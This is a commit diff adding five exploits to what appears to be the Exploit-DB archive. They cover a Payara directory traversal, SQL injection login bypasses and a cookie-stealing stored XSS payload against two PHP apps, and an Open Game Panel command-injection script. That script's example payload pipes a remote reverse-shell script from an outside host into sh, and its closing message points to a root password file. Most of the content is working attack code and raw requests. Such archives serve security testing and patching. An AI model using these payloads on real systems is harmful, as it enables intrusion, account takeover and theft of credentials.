DB: 2021-10-05

5 changes to exploits/shellcodes

Payara Micro Community 5.2021.6 - Directory Traversal
Lodging Reservation Management System 1.0 - SQL Injection / Authentication Bypass
Open Game Panel - Remote Code Execution (RCE) (Authenticated)
Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass
Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)
This commit is contained in:
Offensive Security 2021-10-05 05:02:09 +00:00
parent 8955161978
commit 7cf828b365
6 changed files with 267 additions and 0 deletions

View file

@ -0,0 +1,35 @@
# Exploit Title: Payara Micro Community 5.2021.6 - Directory Traversal
# Date: 01/10/2021
# Exploit Author: Yasser Khan (N3T_hunt3r)
# Vendor Homepage: https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
# Software Link: https://www.payara.fish/downloads/payara-platform-community-edition/#x
# Version: Payara Micro Community 5.2021.6
# Tested on: Linux/Windows OS
# CVE : CVE-2021-41381
https://nvd.nist.gov/vuln/detail/CVE-2021-41381
Proof of Concept:
Step1: Open the browser check the version of the payara software
Step2: Add this Path at end of the URL
/.//WEB-INF/classes/META-INF/microprofile-config.properties
Step3: Check the response with match containing
"payara.security.openid.default.providerURI="
"payara.security.openid.sessionScopedConfiguration=true"
Step4 : If any of these contents in the response then the application is vulnerable to Directory Traversal Vulnerability.
Step5: Alternatively we can use CURL by using this command:
Request:
curl --path-as-is http://localhost:8080/.//WEB-INF/classes/META-INF/microprofile-config.properties
Reference:
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
https://nvd.nist.gov/vuln/detail/CVE-2021-41381

View file

@ -0,0 +1,72 @@
# Exploit Title: Open Game Panel - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intext:"Open Game Panel 2021"
# Date: 08/14/2021
# Exploit Author: prey
# Vendor Homepage: https://www.opengamepanel.org/
# Software Link: https://github.com/OpenGamePanel/OGP-Website
# Version: before 14 Aug patch (https://github.com/OpenGamePanel/OGP-Website/pull/561/commits)
# Tested on: CentOS Linux 5.4.102
#Before the patch, it was possible to inject system commands on "map" parameter when launching a new counter-strike server just by putting the command=
betwen ';', the user needs to be authenticated for this.
import requests
banner = """
@
@ @@& @@@@@/
@ @& #@@@@@& .=
,/%@#
@ @@@@@@@@@@@@@((%@@@@*
@ #@@@@@@@@@@@@@@@*%@,
@ @@@@@@@@@@@@@@&@@@@
@ &@@@@@@@@@/ &@@@.
@ @@@@@@@@@(
@ @@@@@@@@@@@@@&*
@ &@@@@@@@@@@@@@@@@%
@ ,&@@@@@@@@@@@@@
@ %@@@@@@@.
@ .%@@@@@@@@% @@@@@@
@ @@@@@# .&@@@@#
@ (@@@@@@@@@@@. .@@@& @@%
@ .@@@@@, #@@@@@* #@@@ @@@@@
@ @@@& &@@@. @@@
@ ,@@@ @@@@@@
@ @@@ %@@@,
@&@@ @@@,
@@@@
@@@@
*@@@@@# @@ *@@ %@ @@@ @@ @@@@@/ @@@ @@@ ,@@@ ,@( .@=
%
*@/ @@ .@/ @(@ @@ @@@( @@ ,@( @@@* @#@@ @@(@ ,@( .@=
%
*@@@@@@ @@ @ &&.@( @@ @.@@ @@@@ @@.@(@ @@ (@. @@ ,@( .@=
%
*@/ %@(@ @@@ @@ *@@@ @@ @@ @@. @@ @@@@@@, ,@( .@=
%
*@/ @@* @@@ @@ %@@ @@@@@* @@ @@ &@ @@ ,@@@@@ .@=
@@@@
##You can get mod_id and home_id on your game panel URL when you are logged
"""
print(banner)
target = input("Target url: (eg: https://panel.example.org)\n")
opengamepanel_web = input("opengamepanel_web Cookie: (eg: kulonmu5ldu71nmggv2p571nu1)\n")
mod_id = input("Mod_id value: (eg: 2437)\n")
home_id = input("Home_id value: (eg: 3737)\n")
server_ip_port = input("Server IP:port: (eg: 192.168.69.69:42069)\n")
command = input("Payload: (eg: curl https://reverse-shell.sh/1.1.1.1:1337|sh)\n")
url = target + "/home.php?m=gamemanager&p=game_monitor"
cookies = {"opengamepanel_web": opengamepanel_web}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {"mod_id": mod_id, "home_id": home_id, "ip_port": server_ip_port, "map": ";" + command + ";", "start_server": "whatever"}
try:
requests.post(url, headers=headers, cookies=cookies, data=data)
except:
print("Something went wrong, check your inputs or try manually exploiting the map parameter")
print("Finished. you can now literally read the file $HOME/OGP/Cfg/Config.pm for the root password yaay! (CVE-2021-37157)")

View file

@ -0,0 +1,45 @@
# Exploit Title: Lodging Reservation Management System 1.0 - SQL Injection / Authentication Bypass
# Date: 2021-09-20
# Exploit Author: Nitin Sharma(vidvansh)
# Vendor Homepage: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code
# Version: v1.0
# Tested on: Windows 10 - XAMPP Server
# Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts.
#Steps-To-Reproduce:
Step 1 Go to the Product admin panel http://localhost/lodge/admin/login.php.
Step 2 Enter anything in username and password
Step 3 Click on Login and capture the request in the burp suite
Step4 Change the username to ' OR 1 -- - and password to ' OR 1 -- -.
Step 5 Click forward and now you will be logged in as admin.
# PoC:
POST /lodge/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://localhost
Connection: close
Referer: http://localhost/lodge/admin/login.php
Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+
# Authentication Bypass:
# Go to admin login page (http://localhost/lodge/admin/login.php), then use below payload as username and password =>
Username: ' or 1 -- -
Password: ' or 1 -- -

View file

@ -0,0 +1,36 @@
# Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass
# Date: 2021-10-02
# Exploit Author: Jordan Glover
# Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10 + XAMPP v3.3.0
Steps-To-Reproduce:
Step 1 Go to the admin panel http://localhost/bsenordering/admin/login.php
Step 2 Enter the default admin username janobe and enter password test
Step 3 Click on Sign in and capture the request in the Burp Suite
Step 4 Change the user_email to janobe' or '1'='1
Step 5 Click forward and now you will be logged in as an admin.
POC
POST /bsenordering/admin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Origin: http://localhost
Connection: close
Referer: http://localhost/bsenordering/admin/login.php
Cookie: PHPSESSID=him428198e798r23eagi9mapjk
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
user_email=janobe' or '1'='1&user_pass=test&btnLogin=

View file

@ -0,0 +1,74 @@
# Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)
# Date: 2021-10-03
# Exploit Author: Jordan Glover
# Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10 + XAMPP v3.3.0
Young Entrepreneur E-Negosyo System 1.0 suffers from a Cross Site Scripting (XSS) vulnerability.
Step 1 - Create a new product to sell - http://localhost/bsenordering/admin/products/index.php?view=add
Step 2 - Fill out all required fields to create a new product. Input a payload in the product description field - <script>alert(document.cookie)</script>
Step 3 - Save the product.
The stored XSS triggers for all users that navigate to the home page.
POC
POST /bsenordering/admin/products/controller.php?action=add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------375756297829058981022228786743
Content-Length: 1203
Origin: http://localhost
Connection: close
Referer: http://localhost/bsenordering/admin/products/index.php?view=add
Cookie: PHPSESSID=794albocs4b1st3m9hsileorpg
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="OWNERNAME"
Test
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="OWNERPHONE"
0000000000
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PRODESC"
<script>alert(document.cookie)</script>
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="CATEGORY"
3
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="ORIGINALPRICE"
100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PROPRICE"
100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PROQTY"
100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="save"
-----------------------------375756297829058981022228786743--

View file

@ -44483,3 +44483,8 @@ id,file,description,date,author,type,platform,port
50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Andreas Finstad",webapps,multiple, 50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Andreas Finstad",webapps,multiple,
50367,exploits/php/webapps/50367.py,"CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php, 50367,exploits/php/webapps/50367.py,"CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
50370,exploits/php/webapps/50370.txt,"Directory Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php, 50370,exploits/php/webapps/50370.txt,"Directory Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",1970-01-01,"Yasser Khan",webapps,multiple,
50372,exploits/php/webapps/50372.txt,"Lodging Reservation Management System 1.0 - SQL Injection / Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
50373,exploits/multiple/webapps/50373.py,"Open Game Panel - Remote Code Execution (RCE) (Authenticated)",1970-01-01,prey,webapps,multiple,
50374,exploits/php/webapps/50374.txt,"Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Jordan Glover",webapps,php,
50375,exploits/php/webapps/50375.txt,"Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)",1970-01-01,"Jordan Glover",webapps,php,

Can't render this file because it is too large.